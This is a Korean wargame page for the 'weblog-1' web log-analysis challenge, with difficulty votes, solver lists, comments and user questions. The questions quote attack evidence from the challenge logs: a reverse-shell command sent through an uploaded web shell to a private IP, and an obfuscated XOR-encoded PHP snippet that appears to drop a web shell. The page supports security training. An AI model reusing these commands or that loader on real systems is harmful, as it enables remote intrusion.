학습
워게임
CTF
커뮤니티
랭킹
스토어
커리어
Beta
로그인
|
기업 서비스
Home
학습
워게임
CTF
커뮤니티
랭킹
커리어
Beta
기업 서비스로 이동하기 >
LEVEL 2
weblog-1
web
2229
663
로그인 하고 문제 풀기
문제 정보
풀이
49
난이도 투표
52
질문
10
최근 풀이자
663
댓글
70
문제 설명
주어진 코드와 로그를 분석해 주어진 질문에 해당하는 답을 찾아보세요.
Reference
Server-side Basic
Server-side Advanced - SQL Injection
Translate
출제자 정보
Dreamhack
대표 업적 없음
2020.06.15. 10:52:22
First Blood!
posix
대표 업적 없음
출제된 지
4일
만에 풀이 완료!
난이도 투표
52
문제 풀이를 완료한 후에 피드백을 제출할 수 있습니다.
투표 결과
전체 투표 로그
1 / 11
obscurity
대표 업적 없음
LEVEL 3에 투표했습니다.
2개월 전
juen
대표 업적 없음
LEVEL 2에 투표했습니다.
4개월 전
Masamune
대표 업적 없음
LEVEL 2에 투표했습니다.
4개월 전
수강생
강의 수강: 1
LEVEL 3에 투표했습니다.
5개월 전
시건방진영수
대표 업적 없음
LEVEL 2에 투표했습니다.
6개월 전
질문
10
문제 풀이에 어려움이 있으신가요?
커뮤니티에서 문제에 대한 질문하고 답변 얻기
level2 질문
전체 경로 라는게 /uploads/sh.php?cc=bash%20-i%20%3E%26%20/dev/tcp/10.0.0.1/8080%200%3E%261 이런 url 이 있을떄 '/uploads/sh.php' 이것만 말하는건가요?
dkwon
답변
1
추천
4
4년 전
level1
탈취된 admin암호를 log에서 얻는것이 옳은가요?
Modric
답변
1
추천
4
4년 전
level2 질문
LFI 통한 PHP 코드 삽입 공격에 사용된 php 파일 입력하라는 걸로 이해했는데... 아무리봐도 LFI 취약점 있는 파일은 한개밖에 안보이는데... 제가 놓친게 있는건지요 ㅠ 해결되었습니다...
drHack
답변
0
추천
3
4년 전
level3 도와주세요...ㅠㅠ
존재하지 않는 경로면 404에러를 뿜는다는점 이용해서 404인건 다 거르고 계속 찾는데 안나오네요... <?php function m($l,$T=0){$K=date('Y-m-d');$=strlen($l);$_=strlen($K);for($i=0;$i<$;$i++){for($j=0;$j<$_; $j++){if($T){$l[$i]=$K[$j]^$l[$i];}else{$l[$i]=$l[$i]^$K[$j];}}}return $l;} m('bmha[tqp[gkjpajpw')(m('+rev+sss+lpih+qthkew+miecawtlt'),m('8;tlt$laeav,&LPPT+55$040$Jkp$Bkqj`&-?w}wpai, [CAP_&g&Y-?')); ?> 지금 가장 의심가는게 이러한 php코드를 memo로 보내는건데 이게 웹셸 경로랑 무슨 상관있는지도 모르겠고... 못찾겠네요...후... 조그마한 힌트라도 주시면 감사하겠습니다.
Sechack
답변
0
추천
3
4년 전
level1 질문
로그에서 탈취된 암호를 얻는 거 같은데.. 아무리 찾아봐도 모르겠습니다. 힌트라도 주실 수 있나요?ㅠㅠ
KIWI
답변
1
추천
3
4년 전
level3 질문
http 응답코드 구분해서 확인, uploads경로 필터 후 확인 등 여러가지로 접근했는데.. 며칠째 해결이 안되네요.. 무엇을 중점적으로 보는게 나은지 약간의 힌트라도 부탁드립니다 ㅠㅠ
JETA
답변
1
추천
3
4년 전
level 2 답 format
파일의 전체 경로를 입력해주세요 어떤 경로를 말하는 건가요? file system 절대 경로라고 생각했는데... ㅁㄴㅇㄹ 게싱
dohki
답변
1
추천
2
4년 전
웹쉘 경로여..
access.log 안에 있는거 맞나요?ㅜ
awakerrday
답변
1
추천
2
4년 전
level1 질문
payload값을 어디서 찾아야할지 모르겠어요 ㅠㅠ 힌트좀 주실 수 있을까요
뀨닝
답변
1
추천
2
3년 전
???
생성된 웹쉘의 경로란 /uploads/를 의미하나요? 아니면 다른 경로가 또 있나요? 어느 웹쉘을 가리키는 뜻인지 모르겠어요. 힌트 좀 주시겠어요?
Modric
답변
1
추천
2
4년 전
«
‹
1
›
»
최근 풀이자
663
서경대김재중
대표 업적 없음
11시간 전
g3mr00t
카탈로거
11일 전
R=VD
대표 업적 없음
15일 전
seyoung
대표 업적 없음
16일 전
박서연
대표 업적 없음
17일 전
keemnh
대표 업적 없음
17일 전
디융이
대표 업적 없음
17일 전
joody
대표 업적 없음
17일 전
Lorem_ipsum11
대표 업적 없음
21일 전
구
강의 수강: 1
21일 전
«
‹
1
2
3
4
5
›
»
댓글
70
시건방진영수
대표 업적 없음
6개월 전
로그를 처음에 Excel에 잘 옮겼더라면....
Translate
burdock129
스쿼드
7개월 전
재밌습니당
Translate
xeon.a
대표 업적 없음
10개월 전
재밌다!
Translate
군인김도현
Crazy 8
1년 전
2020년 9월 55일로 열심히 디코딩하던 나 칭찬해...
Translate
buaii
워게임 고인물
1년 전
이 문제 엄청나다!
Translate
poppo25
휴머노이드
1년 전
재밋... 다 ...
Translate
하면된다
강의 수강: 50
2년 전
우와 내가 이걸 풀다니
Translate
사용자
해결사
2년 전
이런류의 문제도 앞으로 많이 있으면 좋을 것 같군요~
Translate
ssongk
2024 Invitational Contenders
2년 전
level 3가 고비였던 문제
Translate
Ox0ne
대표 업적 없음
2년 전
아직은 너무 어려운..ㅠㅠ
Translate
«
‹
1
2
3
4
5
›
»
댓글 70